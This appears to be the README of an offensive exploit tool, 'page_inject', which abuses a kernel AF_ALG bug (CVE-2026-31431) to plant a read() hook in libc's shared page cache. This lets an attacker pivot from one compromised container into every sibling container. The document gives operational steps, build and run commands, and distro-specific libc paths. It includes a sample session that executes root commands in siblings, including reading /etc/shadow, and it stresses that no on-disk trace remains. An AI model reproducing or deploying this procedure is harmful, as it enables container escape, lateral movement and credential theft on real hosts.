AF_ALG aead vulnerability cross-container exploit -- pivot from one compromised container into every sibling container that shares the same libc.so.6 image layer.
This is an escape primitive: it runs from
inside an unprivileged container that the attacker has already
compromised, and uses the AF_ALG authencesn ESN-rotation 4-byte
arbitrary-write bug (CVE-2026-31431) to plant a persistent read()
hook in the page-cache pages of libc.so.6. Because Docker /
containerd back overlayfs lower-layer files with shared inodes,
those pages are visible to every sibling container instantiated from
the same image -- the hook fires in their processes too, and the
attacker gets command execution inside each one.
- Attacker has shell access to a single container (call it
victim) on a host that runs other containers (siblings) from the same image asvictim. victimruns with default Docker/k8s posture: unprivileged uid inside the container's user namespace, default seccomp profile, default AppArmor profile, no special capabilities, no host bind mounts.victimhas only:- read access to its own libc (
/usr/lib/x86_64-linux-gnu/libc.so.6or wherever the distro installs it) - the standard
socket(AF_ALG, ...)syscall family - the standard
splice/vmsplicesyscalls - write access to a directory it can
chmod +x(e.g./tmp)
- read access to its own libc (
- The kernel must be vulnerable to CVE-2026-31431 (any
algif_aead + authencesnbuild prior to the upstream revert fix).
That is all. No special CAP_*, no host filesystem
access. The attacker drops a self-contained statically-linked binary
inside the container, runs it, and the page-cache corruption -- and
therefore the hook -- becomes visible to every sibling.
-
Page-cache page identity. Inside an overlayfs container,
/usr/lib/.../libc.so.6is served by the lower image layer's ext4 inode. Every container started from the same image shares that backing inode, and the kernel's page cache is keyed by the underlying inode -- not by the overlay or by the namespace. So a single 4-byte write into a page-cache page is visible to all sibling containers' processes that have that page mmap'd. -
AF_ALG aead vuln turns one such write into many.
algif_aeadchains the user RX iovec with the trailingauthsizebytes of the spliced TX SGL, andauthencesn's ESN rotation parks 4 bytes of the AAD'sseq_highfield atdst[assoclen + cryptlen]-- which is the first byte of that chained foreign tail. The spliced page is a page-cache page of a file the attacker only has read access to, but the cipher copies bytes into it anyway, with no dirty bookkeeping. (Seecrypto/algif_aead.candcrypto/authencesn.cfor the underlying mechanics.) -
Bootstrapping a callable primitive. The first thing
page_injectdoes is bootstrap Zone A -- an asm-encoded re-implementation of the same AF_ALG dance (write_cache.asm), placed inside libc's.textcave. This makes the 4-byte write a regularcallfrom inside any future hook payload, no per-call socket setup needed. -
Installing the hook. The injector then writes Zone C (
zone_c.asm) into libc's.textcave and patches the first 7-12 bytes ofread()with anE9 disp32jump to it. The prologue's displaced bytes are emulated faithfully in Zone C's fast-path (three different glibc prologues are recognised -- see "Prologue handling" below). The hook is now live in libc's page cache. -
Hook propagation. Every sibling container runs processes that call
read()constantly (logging daemons, healthchecks,cat /etc/hostname, anything). On the first such call inside a sibling container, the hijacked prologue jumps into Zone C, which:stat("/")s the container's root inode (a stable per-namespace ID), uses it as the container's slot key,- scans the slot table for an existing entry with that key,
- if absent, registers the key and
fork()s a long-lived command-loop child that polls the CMD area for orders, - returns to
read()+Nso the caller is none the wiser. The original sibling process keeps running. From now on the attacker has a daemon inside that container.
-
Command channel. The attacker uses the same
page_injectbinary in--shellmode to write commands into the slot region's CMD area. Each registered sibling container's hook child polls, forks/bin/sh -c <cmd>, captures stdout/stderr into the OUTPUT area, signals completion, and goes back to polling. The shell shows the output. Because every CMD/OUTPUT write also goes through the vuln primitive, no special privilege is needed. -
Unhook. When done,
unhookrestoresread()'s original prologue bytes and zeros the slot table; hook children see an empty slot on their next iteration and self-terminate. The page-cache modifications themselves are clean (the kernel never marked the modified pages dirty), so once every container that has libc mmap'd is stopped, adrop_cachesreverts the cache fully -- no on-disk artefact remains.
The injector is built outside the victim container -- typically
on the attacker's own development machine -- because most production
container images don't ship a compiler. A standard Linux x86_64 dev
environment with gcc (with -static-link support) and nasm is
enough.
make # assembles .asm sources via gen_arrays.sh, links static page_inject
make shellcode # also produces inspectable .bin flat binaries
make clean # removes generated files and the binaryThe output is a single statically-linked ELF (./page_inject) that
runs on any modern x86_64 Linux kernel.
Once the attacker has shell on victim, they upload the binary to a
writable directory (typically /tmp):
# inside the compromised container, attacker session
victim$ ./page_injectWith no arguments, page_inject defaults to
/usr/lib/x86_64-linux-gnu/libc.so.6 (the post-merge Debian/Ubuntu
location). For other distros the libc is at a different path; either
pass it explicitly or use --root / to scan the built-in lookup
table from the container's root:
# Fedora / Rocky / CentOS
victim$ ./page_inject /usr/lib64/libc.so.6
# Arch
victim$ ./page_inject /usr/lib/libc.so.6
# Auto-detect, regardless of distro:
victim$ ./page_inject --root /Either invocation does the same thing: ELF-parse the in-container
libc, install the hook in its page cache, monitor the slot table for
~30 s while siblings register, and run a one-shot id against the
first sibling that registered as a sanity check.
After bootstrap, drop into the command shell to drive any registered sibling:
victim$ ./page_inject --shell --no-bootstrap
=== page-cache shell ===
Containers (3):
[0] 0x0018598d <- target
[1] 0x001859ab
[2] 0x001859cd
inject:0018598d> exec id
uid=0(root) gid=0(root) groups=0(root)
inject:0018598d> target 0x001859ab
inject:001859ab> exec hostname
1ccd66abee9d
inject:001859ab> exec cat /etc/shadow
root:$6$.....
inject:001859ab> unhook
... read() prologue restored, slot table zeroed ...
unhook cleans the hook out of every sibling container in one shot
and lets the hook children self-terminate.
Usage: page_inject [OPTIONS] [LIBC_PATH]
Options:
--root <prefix> Auto-resolve libc.so.6 under <prefix> using the
built-in fixed-path lookup table. Inside the
victim container that's normally --root / .
--shell [0xKEY] Drop into interactive command shell after
injection. Optional KEY pre-selects the target.
--no-bootstrap Skip injection (shell-only; hook must already
be live in the page cache).
--timeout SEC Slot monitoring timeout in --shell mode
(default 30 s).
--help, -h Show help.
Default libc (when no --root and no LIBC_PATH given):
/usr/lib/x86_64-linux-gnu/libc.so.6
Different glibc builds leave different amounts of .text cave space
between the executable LOAD segment and the next read-only LOAD.
page_inject selects between two layouts at inject time:
-
Path A -- libc-only (default). Both Zone C and Zone A live in libc's
.textcave. The slot table + CMD + OUTPUT areas live in libc's.hashsection -- legacy SysV hash data that ld.so doesn't read at runtime since it uses.gnu.hashinstead. When.hashis absent (Arch's modern toolchain),page_injectcarves the slot region out of the tail of.eh_frame_hdrinstead, after first shrinking thefde_countfield so the unwinder no longer considers the freed bytes part of the FDE binary-search index (the unwinder transparently falls through to a linear scan of.eh_framefor any IP whose FDE used to be in the truncated range -- LSB-mandated behaviour). -
Path B -- libc trampoline + ld.so payload. Some glibc builds shrink the libc cave below the size needed for the full Zone C + Zone A payload (Ubuntu 24.04 / glibc 2.39 ships an 711 B cave). In that case
page_injectwrites a 36 B trampoline into libc's cave -- it does the fast-path.bss-key gate intra-libc -- and on the slow path it computes ld.so's runtime base from libc's GOT slot for_rtld_global(an ld.so-side symbol every glibc imports privately) and jumps into a base-register variant of Zone C in ld.so's.textcave. The slot table + CMD + OUTPUT.bsskey all stay in libc; the ld.so-side Zone C reaches them throughrbp + offsetafter the trampoline seedsrbp = libc_base.
If neither layout fits, page_inject refuses cleanly without
writing anything to libc or ld.so on disk or in the page cache.
Different glibc versions emit different opening sequences in
read(). The injector recognises each one, reads back the bytes
that the hook displaces, and emulates them in Zone C's fast-path so
single-threaded read() resumes correctly at read+N:
| Glibc range | Prologue (after optional endbr64) |
Notes |
|---|---|---|
| 2.36 / 2.39 | cmpb $0x0, __libc_single_threaded(%rip) |
7 bytes; emulated cmpb sets ZF for the original jne .Lthreaded. |
| 2.43 | push rbp; movsxd rdi,edi; xor r9d,r9d |
7 bytes; emulated byte-for-byte. |
| 2.31 / 2.35 | mov eax, fs:[0x18] |
8 bytes; emulated byte-for-byte (FS-prefixed [disp32] is absolute, not RIP-relative, so byte-copy is faithful). |
The fast-path emulation slot in Zone C is sized for the longest
known prologue (8 bytes) plus the 5-byte rel32 jmp; shorter
prologues fill the trailing slot byte with a NOP filler so the
total slot length is constant.
page_inject/
page_inject.c Main injector: ELF parsing, vuln primitive,
dual-path layout selection, inject + unhook.
zone_c.asm Path-A hook dispatcher shellcode.
zone_c_ld.asm Path-B hook dispatcher (rbp-base variant).
trampoline.asm Path-B 36-byte libc-side stub.
write_cache.asm Zone A (vuln write primitive shellcode).
gen_arrays.sh Assemble .asm -> asm_bytecode.c.
asm_bytecode.c [generated] shellcode byte arrays.
Makefile Build system.
The exploit has been verified end-to-end on the following container
snap distros. Each entry has had page_inject injected from inside
one container and seen its hook fire in a sibling container started
from the same image; commands executed correctly via the page-cache
channel; and unhook restored the libc page state cleanly.
| Image | glibc | Inject path | Read() prologue | Slot region |
|---|---|---|---|---|
debian:bookworm |
2.36 | A | cmpb | .hash |
ubuntu:24.04 |
2.39 | B | cmpb | .hash (libc-side, addressed via rbp from ld.so) |
ubuntu:22.04 |
2.35 | A | TLS-fs | .hash |
fedora:40 |
2.39 | A | cmpb | .hash |
archlinux:latest |
2.43 | A | push-rbp | .eh_frame_hdr (truncated tail) |
page_injectis statically linked deliberately so the attacker's own process is unaffected by the hook it installs.page_injectrecognises an "already hooked" libc (E9 + nops atread()'s prologue) and refuses to re-inject. If you are on a test env and your page cache is stuck in that state, stop all containers using the image anddrop_cachesto reset.